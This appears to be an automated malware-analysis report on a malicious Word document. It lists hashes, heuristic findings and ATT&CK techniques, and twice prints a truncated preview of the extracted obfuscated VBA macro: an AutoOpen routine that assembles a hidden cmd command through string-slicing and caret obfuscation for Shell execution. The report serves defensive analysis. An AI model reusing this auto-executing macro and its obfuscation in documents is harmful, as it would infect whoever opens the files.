Office (OLE) malware analysis — malicious · ebb6e0800b1f4f25

MALICIOUS

Office (OLE)

157.4 KB Created: 2018-09-24 06:19:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: 726a3705ac61fc3bf48533b4d16f190f SHA-1: 4cdbe9ce412a692f44f7fb82aed11d1ee43732b6 SHA-256: ebb6e0800b1f4f252c8e7e6c3893d792a0698065cde0ea011c951660825645ef

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute a command using the Shell() function, which is a strong indicator of a downloader or droppper functionality. The macro is heavily obfuscated, making it difficult to determine the exact payload or destination, hence the family is unknown.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 126715 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	126715 bytes
SHA-256: `43aa01baf7ff30a2eb78e3edf3989012ba6f1a0a6e74bc922fe7e11a2097cf4e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ToMzNnSz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim vtDFsb(2) vtDFsb(0) = Mid(HcCjHwGuBd + RTzpokiulPkwOXdBEIwTrOcNm + sWLjRcvNRHwHdV, 234, 353) + Left(bcudbUrUzFbMW + ztsYQzvhnGuBSwfwLjzOvqpwcp + kFcdcTt, 418) vtDFsb(1) = MidB(uHXhNpCBafV + vAizhbATrBBBYoVMYfosqNczua + iiYjdzV, 230, 894) + Left(CFWYLRNj + BdAHHokEcGsvSadrKXadSlnToRhhuAd + XZWJkHS, 792) + MidB(JDwiZCIXmbz + UUwnuZzbSlFSoOGjwLdQqiIimcqFG + CooTYQW, 965, 838) + Right(dHNtRDTLjKq + FluLzbfPOmZSPbNlzLEBQsL + vGtLkhOmVLzP, 762) Dim sUAIG(2) sUAIG(0) = Right(pEMnrHvXjjr + rLbKAcMChvFOuUAlYqkBQrwADw + MclThsqI, 569) + Mid(IXQicMbXAFF + GJLSBcJFFZddbnHsVPbiAIWocZa + TRNXhXHB, 866, 398) sUAIG(1) = Left(jFzlnPIjzmEifK + ohjiXcJLNPaOHcuYjXCoJRSJ + jsWNcMMnY, 509) + Left(nXYooVqJJFwqGH + XMESdwiXEHmuQAGPIjUdzTWDdtf + aTQLVlSptA, 703) Dim aGsEU(2) aGsEU(0) = Mid(zYJOZhkPXkQA + FuopaSYZiOoLVrzhkIhiBORhGcpUsnlU + OuQNauu, 319, 705) + MidB(XaCjrAiXP + JlRwpuFBaAfTqsbUnklSiCmoAnGwwRnli + FAKjvNshjpz, 480, 195) aGsEU(1) = Right(BzNSjtCFEOT + bjENfqijauzEUDwBOwMQXMMkCuGVbJJGD + tTBwbCNNsZzG, 61) + MidB(sSLqhBTGfo + YvhOzNQVcKonJwTLCVERqvMDjZNVH + pSLKztmiuhw, 443, 66) Dim bUznkn(2) bUznkn(0) = Right(FHuAkdTnotSIUb + BwCQOVJvqIpXzBIwwnOCrsLauzGY + PmokrjjzwJc, 767) + MidB(prKJYVMwnuK + uOwkjqsNNXHNWfoDwjlCmwziS + tZTjoiAZszCjci, 753, 38) + Mid(jIiUGbTJMLnjLa + TznjiwofjuDJYzflKPYSsNiWplI + CNLpOiQkUDo, 16, 630) + Left(nLsujoS + fvTDZwtXTSAwNKKPBqMkSijdtNFnjOQKSKM + KQjOPDaBLk, 329) bUznkn(1) = MidB(mKNjWYqVAKO + hwzOACqVBlzhaIboAHbGzinoUz + SkwWiBz, 679, 287) + MidB(kpbmpziu + ZdJFqCfNOWVOSMjEiZkEArQVvzqlF + tGoQozRWAZ, 715, 863) Dim AvdAR(2) AvdAR(0) = Mid(iqSnKjvPoN + UjHADuQqjsYJjSsGqZWnVrM + jitkqtD, 416, 857) + Left(GBNJuzuddw + vGqkwtlIqLJHfqhPdLhApMMsXwiF + hzdAIEcGm, 674) + Right(FdEqNNAnnacGA + AOLIGCszsdhHjakjFwohjUFUaHUXzk + saaooNfLMfG, 537) + Mid(psACRCLjb + iRqYGhWHiJJRDdVENdQNSbXzS + LznnGvpnG, 969, 697) AvdAR(1) = MidB(ifjisYwiLXaXRE + ijDnqXKWdDwNqPdGTimEuSizbNPorRqX + jGHVNFoaksw, 347, 933) + Mid(VlEufJUHXiINPH + rrzWNbRijPThqCQwqVfjWOwjmErZTo + azukuUa, 202, 292) + MidB(RVZsPYlRNOHaI + iZspztzziQDGbMSUfbNMbBiXfrT + VCpASZquTXqb, 243, 342) + Left(Avnujid + RoRVSGPrQZULAvphWkOjYRiwjiFnZ + AkYYBRbjwjklp, 886) Dim zUmvc(1) zUmvc(0) = MidB(tEnKjNK + wYAKQJLZvBSDnfBnYGSncKfTNGsVlhkoR + oqJMAbjAFZwI, 906, 783) + MidB(MUNBdkpzSDf + CrYHGkPJacOfZuPwzBYUDsDDALtzw + CiaAoEoXlrd, 750, 963) WtFTlttUE (KeyString(vbKeyC) + KeyString(vbKeyM) + NmJqOmSH + MBGjPnwQzw + UjfXwW + UFzzTiWUPCjO + fnLAXMozIcti) Dim ZFFtEc(2) ZFFtEc(0) = Right(wELYLFlmYZZEL + znjtWzVFpstJwnKVHoozAjMVETFhRjdI + iDtdwWfRLb, 811) + Right(DwWCVIoiK + RmjKcLjohomvLISTlfSEBlujIz + YtQLLmVpzvBD, 512) ZFFtEc(1) = MidB(bqMpVzmYzwihZ + XoQCOLfzwjzXpdOdktSJvnlUTNdEwHVXN + CjwrQJXEPi, 388, 686) + MidB(fPpcfVPdqLmSbB + SQcFhMWfAXiWmwdQrjvhRIZ + FziWRMQEHzPT, 853, 821) + Right(zhHENIuUkvW + KwIWmthRBQJWWYrzzpwCSmXwDNlVqtV + HwGzONv, 317) + MidB(SmVcmvjYfrUq + wiDQuTcZZkAtrjpUEFJhlwa + qFiQMrAkJf, 416, 588) End Sub Attribute VB_Name = "NArmCpopTJVfJ" Function NmJqOmSH() Dim ZIwPGl(1) ZIwPGl(0) = Right(mbrltzlpkQzpi + OOrINljFkEIciMkOzBltCQVZCWAhR + wSjmpGFWwApp, 165) + MidB(jkknZGdUor + ijsDmPtjEbQkrimtMOfpQziTdVz + zubnGwCZPidcJT, 44, 642) + Right(bbRfwztbGHwQK + jSqQrfzKzjBNHlCiWQdSvcti + cwUhPcBLRjLdQP, 651) + MidB(jUdiKOjZvDAvnz + OYwOUzicUSTtAOfNJMQSkoHTZ + dlJVBrjAc, 670, 805) iVIRtdtjtk = "d /V" + "/C" + CStr(Chr(1 + 3 + 0 + 2 + 28)) + "s^e^t " + "^" + "\-=_^" + "-/ ^_^-/ \" + "_/^ ^_^\/^ " + "/_-^ " Dim UjNLoG(2) UjNLoG(0) = Right(JcIWYjpQbIH + naWRbmKYDdafiNhCGzJaOFzqMslG + zhJqtMT, 75) + Mid(ZiwszbhdaENC + HLiwztmaZfBErDUEXAkIEs + HfwmzDIj, 654, 666) + Left(zwcEWMw + aFVKwGzXDZDNiRbmizvILwEZYflrwNVh + cwzILfIUtRT, 209) + Mid(izbhETKOtjbr + HzNwrzKjzmzqqDmGNDClncGSNFQhTNaNt + TdYuzokOqT, 216, 132) UjNLoG( ... (truncated)

SHA-256: 43aa01baf7ff30a2eb78e3edf3989012ba6f1a0a6e74bc922fe7e11a2097cf4e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ToMzNnSz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim vtDFsb(2)
vtDFsb(0) = Mid(HcCjHwGuBd + RTzpokiulPkwOXdBEIwTrOcNm + sWLjRcvNRHwHdV, 234, 353) + Left(bcudbUrUzFbMW + ztsYQzvhnGuBSwfwLjzOvqpwcp + kFcdcTt, 418)
vtDFsb(1) = MidB(uHXhNpCBafV + vAizhbATrBBBYoVMYfosqNczua + iiYjdzV, 230, 894) + Left(CFWYLRNj + BdAHHokEcGsvSadrKXadSlnToRhhuAd + XZWJkHS, 792) + MidB(JDwiZCIXmbz + UUwnuZzbSlFSoOGjwLdQqiIimcqFG + CooTYQW, 965, 838) + Right(dHNtRDTLjKq + FluLzbfPOmZSPbNlzLEBQsL + vGtLkhOmVLzP, 762)
   Dim sUAIG(2)
sUAIG(0) = Right(pEMnrHvXjjr + rLbKAcMChvFOuUAlYqkBQrwADw + MclThsqI, 569) + Mid(IXQicMbXAFF + GJLSBcJFFZddbnHsVPbiAIWocZa + TRNXhXHB, 866, 398)
sUAIG(1) = Left(jFzlnPIjzmEifK + ohjiXcJLNPaOHcuYjXCoJRSJ + jsWNcMMnY, 509) + Left(nXYooVqJJFwqGH + XMESdwiXEHmuQAGPIjUdzTWDdtf + aTQLVlSptA, 703)
   Dim aGsEU(2)
aGsEU(0) = Mid(zYJOZhkPXkQA + FuopaSYZiOoLVrzhkIhiBORhGcpUsnlU + OuQNauu, 319, 705) + MidB(XaCjrAiXP + JlRwpuFBaAfTqsbUnklSiCmoAnGwwRnli + FAKjvNshjpz, 480, 195)
aGsEU(1) = Right(BzNSjtCFEOT + bjENfqijauzEUDwBOwMQXMMkCuGVbJJGD + tTBwbCNNsZzG, 61) + MidB(sSLqhBTGfo + YvhOzNQVcKonJwTLCVERqvMDjZNVH + pSLKztmiuhw, 443, 66)
   Dim bUznkn(2)
bUznkn(0) = Right(FHuAkdTnotSIUb + BwCQOVJvqIpXzBIwwnOCrsLauzGY + PmokrjjzwJc, 767) + MidB(prKJYVMwnuK + uOwkjqsNNXHNWfoDwjlCmwziS + tZTjoiAZszCjci, 753, 38) + Mid(jIiUGbTJMLnjLa + TznjiwofjuDJYzflKPYSsNiWplI + CNLpOiQkUDo, 16, 630) + Left(nLsujoS + fvTDZwtXTSAwNKKPBqMkSijdtNFnjOQKSKM + KQjOPDaBLk, 329)
bUznkn(1) = MidB(mKNjWYqVAKO + hwzOACqVBlzhaIboAHbGzinoUz + SkwWiBz, 679, 287) + MidB(kpbmpziu + ZdJFqCfNOWVOSMjEiZkEArQVvzqlF + tGoQozRWAZ, 715, 863)
   Dim AvdAR(2)
AvdAR(0) = Mid(iqSnKjvPoN + UjHADuQqjsYJjSsGqZWnVrM + jitkqtD, 416, 857) + Left(GBNJuzuddw + vGqkwtlIqLJHfqhPdLhApMMsXwiF + hzdAIEcGm, 674) + Right(FdEqNNAnnacGA + AOLIGCszsdhHjakjFwohjUFUaHUXzk + saaooNfLMfG, 537) + Mid(psACRCLjb + iRqYGhWHiJJRDdVENdQNSbXzS + LznnGvpnG, 969, 697)
AvdAR(1) = MidB(ifjisYwiLXaXRE + ijDnqXKWdDwNqPdGTimEuSizbNPorRqX + jGHVNFoaksw, 347, 933) + Mid(VlEufJUHXiINPH + rrzWNbRijPThqCQwqVfjWOwjmErZTo + azukuUa, 202, 292) + MidB(RVZsPYlRNOHaI + iZspztzziQDGbMSUfbNMbBiXfrT + VCpASZquTXqb, 243, 342) + Left(Avnujid + RoRVSGPrQZULAvphWkOjYRiwjiFnZ + AkYYBRbjwjklp, 886)
   Dim zUmvc(1)
zUmvc(0) = MidB(tEnKjNK + wYAKQJLZvBSDnfBnYGSncKfTNGsVlhkoR + oqJMAbjAFZwI, 906, 783) + MidB(MUNBdkpzSDf + CrYHGkPJacOfZuPwzBYUDsDDALtzw + CiaAoEoXlrd, 750, 963)
WtFTlttUE (KeyString(vbKeyC) + KeyString(vbKeyM) + NmJqOmSH + MBGjPnwQzw + UjfXwW + UFzzTiWUPCjO + fnLAXMozIcti)
   Dim ZFFtEc(2)
ZFFtEc(0) = Right(wELYLFlmYZZEL + znjtWzVFpstJwnKVHoozAjMVETFhRjdI + iDtdwWfRLb, 811) + Right(DwWCVIoiK + RmjKcLjohomvLISTlfSEBlujIz + YtQLLmVpzvBD, 512)
ZFFtEc(1) = MidB(bqMpVzmYzwihZ + XoQCOLfzwjzXpdOdktSJvnlUTNdEwHVXN + CjwrQJXEPi, 388, 686) + MidB(fPpcfVPdqLmSbB + SQcFhMWfAXiWmwdQrjvhRIZ + FziWRMQEHzPT, 853, 821) + Right(zhHENIuUkvW + KwIWmthRBQJWWYrzzpwCSmXwDNlVqtV + HwGzONv, 317) + MidB(SmVcmvjYfrUq + wiDQuTcZZkAtrjpUEFJhlwa + qFiQMrAkJf, 416, 588)
End Sub


Attribute VB_Name = "NArmCpopTJVfJ"
Function NmJqOmSH()
Dim ZIwPGl(1)
ZIwPGl(0) = Right(mbrltzlpkQzpi + OOrINljFkEIciMkOzBltCQVZCWAhR + wSjmpGFWwApp, 165) + MidB(jkknZGdUor + ijsDmPtjEbQkrimtMOfpQziTdVz + zubnGwCZPidcJT, 44, 642) + Right(bbRfwztbGHwQK + jSqQrfzKzjBNHlCiWQdSvcti + cwUhPcBLRjLdQP, 651) + MidB(jUdiKOjZvDAvnz + OYwOUzicUSTtAOfNJMQSkoHTZ + dlJVBrjAc, 670, 805)
iVIRtdtjtk = "d /V" + "/C" + CStr(Chr(1 + 3 + 0 + 2 + 28)) + "s^e^t " + "^" + "\-=_^" + "-/ ^_^-/ \" + "_/^ ^_^\/^ " + "/_-^ "
Dim UjNLoG(2)
UjNLoG(0) = Right(JcIWYjpQbIH + naWRbmKYDdafiNhCGzJaOFzqMslG + zhJqtMT, 75) + Mid(ZiwszbhdaENC + HLiwztmaZfBErDUEXAkIEs + HfwmzDIj, 654, 666) + Left(zwcEWMw + aFVKwGzXDZDNiRbmizvILwEZYflrwNVh + cwzILfIUtRT, 209) + Mid(izbhETKOtjbr + HzNwrzKjzmzqqDmGNDClncGSNFQhTNaNt + TdYuzokOqT, 216, 132)
UjNLoG(
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.